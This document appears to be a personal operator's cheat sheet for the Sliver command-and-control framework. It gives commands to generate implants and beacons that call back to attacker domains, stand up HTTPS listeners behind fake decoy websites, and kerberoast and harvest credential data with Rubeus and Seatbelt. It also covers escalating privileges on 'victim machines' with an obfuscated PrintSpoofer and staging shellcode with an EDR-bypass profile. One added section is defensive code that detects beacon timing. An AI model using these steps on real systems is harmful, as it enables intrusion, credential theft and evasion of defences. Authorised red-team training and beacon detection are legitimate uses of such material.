Sliver
Sliver's a rad C2
Resources that help me make sense of Sliver
- Tutorial: Create a MacroPack Pro Sliver stager with AV bypass
- Passing the OSEP exam using Sliver
- Tutorial: Sliver C2 with BallisKit MacroPack and ShellcodePack
Install Sliver
Linux one-liner
curl https://sliver.sh/install|sudo bash
With dependencies (if not already installed):
sudo apt install mingw-w64
With single binary
cd ~/
wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux
chmod +x sliver-server_linux
Install certbot (optional, if you want to integrate with LetsEncrypt)
sudo apt install certbot -y
sudo certbot certonly
# I like this method because I port-forward 80/443 to my internal host, then choose option 1 (temporary Web server) and then fill out the rest of the fields to generate my cert
#
# Copy the key files to the home folder to make them easier to access later:
#
# sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/
# sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/
#
# Adjust permissions so your basic "kali" or whatever user can see these files:
# sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem
# sudo chmod 640 privkey.pem fullchain.pem
Run Sliver
sudo ./sliver-server_linux
Install the armory
(At a sliver shell)
armory install all
Armory "must haves"
Certify
# Install it
armory install certify
# Basic run
certify -- find /vulnerable
Rubeus
# Install it
armory install rubeus
# Find Kerberoastable users
rubeus -- kerberoast /nowrap
Seatbelt
# Install it
armory install seatbelt
# Useful checks
seatbelt -- DotNet
seatbelt -- Antivirus
seatbelt -- WindowsDefender
seatbelt -- LocalUsers
seatbelt -- LogonSessions
seatbelt -- CredentialFiles
seatbelt -- ChromiumPresence
seatbelt -- KeePassPresence
seatbelt -- TokenPrivileges
seatbelt -- PowerShellHistory
seatbelt -- ProcessCreationEvents
seatbelt -- NetworkShares
seatbelt -- ScheduledTasks
seatbelt -- Services
seatbelt -- UAC
# Interesting files
seatbelt -- InterestingFiles
seatbelt -- InterestingProcesses
# Save output to file
seatbelt --save -- -group=all
Sharphound
# Install it
armory install sharp-hound-4
# Basic collection - will create a file called something like 20260311170832_filename.zip
sharp-hound-4 -s -t 300 -- -c all --zipfilename filename
IMPLANTS
Generate a general mtls implant
generate --mtls domain.dom:8888 --format shellcode --arch amd64 --skip-symbols --save splinter.bin --name ETPHONEHOME
Generate a general HTTPS implant
generate --http https://10.7.10.253:8090 --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME
Generate an HTTPS implant with a custom domain
generate --http yourdomain.ru --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME
Delete an implant
implants rm NAME-OF-IMPLANT
You might also have to delete disk-level remnants. For example, if you previously made an implant called ETPHONEHOME and then try to make another one, Sliver might complain like this:
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[!] rpc error: code = Internal desc = rename import dir: target exists: /root/.sliver/slivers/windows/amd64/etphonehome/src/runc/cgroup
In that case, remove the leftover build directory from disk (at a regular command prompt) with:
sudo rm -rf /root/.sliver/slivers/windows/amd64/etphonehome
Start a general listener
https --lhost 10.7.10.253 --lport 8090
Start a listener with a custom domain
https --domain example.com
Generate a fake Web site to go along with your HTTPS listener
First make a ~/www folder, and then:
websites add-content --website fake-blog --web-path / --content www/index.html
Note: the fake-blog name will be referenced below if you set up an HTTPS listener with a custom domain and specific fake content.
Starting an HTTPS listener with a custom domain WITH a pre-generated LetsEncrypt cert AND static content on your fake site
https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog
Establishing sessions with victim machines
From the victim system, find a way to run your beacon.exe. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated printspoofer.exe:
use xxx (the session that was spawned)
upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe
Then run it:
execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe
Interacting with sessions
Run BloodHound
sharp-hound-4 -- -c all --outputdirectory 'c:\users\public'
Specify --outputdirectory because what I've found is that by default it tries to write to c:\windows\system, which will be problematic if you're not a full local admin. Plus I don't want to clutter that directory up with a bunch of garbage.
Find and download it:
ls *.zip
download 2025blahblah.zip
Kill all dead sessions (marked as [DEAD])
sessions -C
BEACONS
Generate one with custom domain
generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE
Check beacon status
beacons
Watch beacons continuously for check in
beacons watch
Adjust check-in time of the beacon
use xxx
# Reconfigure callback time to 200s with an 11s jitter
reconfigure -i 200s -j 11s
Check pending tasks
tasks
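Seen from the defender's side, a fixed check-in interval with a small jitter, like the 200s/11s setting above, leaves evenly spaced connections in proxy or flow logs. The following is an added example (not part of the original notes and not Sliver code) that scores each source/destination pair by the median gap between connections and the median absolute deviation of those gaps; the log format, IP addresses, thresholds, and the assumption that jitter is added on top of the interval are constructed for illustration.

```python
from collections import defaultdict
from statistics import median

def build_sample_log():
    """Constructed sample lines: 'epoch_seconds src_ip dst_host'."""
    lines, t = [], 1_700_000_000
    # Host A: 200s interval plus 0-11s jitter (values chosen by hand).
    for jitter in [3, 11, 0, 7, 5, 9, 2, 10, 6, 1]:
        lines.append(f"{t} 10.0.0.5 custom.domain")
        t += 200 + jitter
    # Host B: irregular, human-driven browsing.
    t = 1_700_000_000
    for gap in [4, 950, 12, 37, 2600, 8, 410, 75, 1300, 22]:
        lines.append(f"{t} 10.0.0.9 news.example")
        t += gap
    return lines

def parse(lines):
    """Group timestamps by (source, destination); skip malformed lines."""
    flows = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) == 3 and parts[0].isdigit():
            flows[(parts[1], parts[2])].append(int(parts[0]))
    return flows

def beacon_score(timestamps, min_events=6):
    """Return (median_gap, MAD / median_gap), or None with too few events."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    med = median(gaps)
    if med <= 0:
        return None
    mad = median(abs(g - med) for g in gaps)
    return med, mad / med

def find_beacons(lines, max_spread=0.10, min_gap=30):
    """Flag flows whose gaps are long enough and tightly clustered."""
    hits = {}
    for key, ts in parse(lines).items():
        score = beacon_score(ts)
        if score and score[0] >= min_gap and score[1] <= max_spread:
            hits[key] = score
    return hits

if __name__ == "__main__":
    for (src, dst), (gap, spread) in find_beacons(build_sample_log()).items():
        print(f"{src} -> {dst}: median gap {gap}s, spread {spread:.3f}")
```

The median and MAD are used instead of mean and standard deviation so that a single missed or delayed check-in does not hide an otherwise regular pattern.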
PROFILES
Under construction
Generate profile
profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee
Add fake blog
websites add-content --website fake-blog --web-path / --content www/index.html
Stand up domain with HTTPS
https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog
Stage a listener
stage-listener --url https://yourdomain.com:8080 --profile bee
Generate the profile
profiles generate bee
Set up a staged payload with shellcodepack
echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json
Start/restart sliver
sudo systemctl start sliver
Sliver quick reference for system interaction
Find basic info about the session:
[localhost] sliver (etphonehome) > info
Session ID: a07faa10-3584-4205-88f3-e1c1ad0ff400
Name: etphonehome
Hostname: dc-vil
UUID: cb7bb9dd-833f-4521-9614-dab4560d794d
Username: NINJA\localuser
UID: S-1-5-21-11790880-2535113846-25489808-1000
GID: S-1-5-21-11790880-2535113846-25489808-513
PID: 2984
OS: windows
Version: Server 2016 build 17763 x86_64
Locale: en-US
Arch: amd64
Active C2: https://domain.domain
Remote Address: 1.2.3.4:50737
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Wed Mar 11 22:04:17 UTC 2026 (8m31s ago)
Last Checkin: Wed Mar 11 22:12:47 UTC 2026 (1s ago)
Logged on user:
sa-whoami
sa-netloggedon
Quick reference (for me to quickly get up and running with a custom domain with HTTPS listener and obfuscated payload)
# generate the thing
generate --http custom.domain --format exe --arch amd64 --skip-symbols --save splinter.exe --name ETPHONEHOME
# start listening
https --domain custom.domain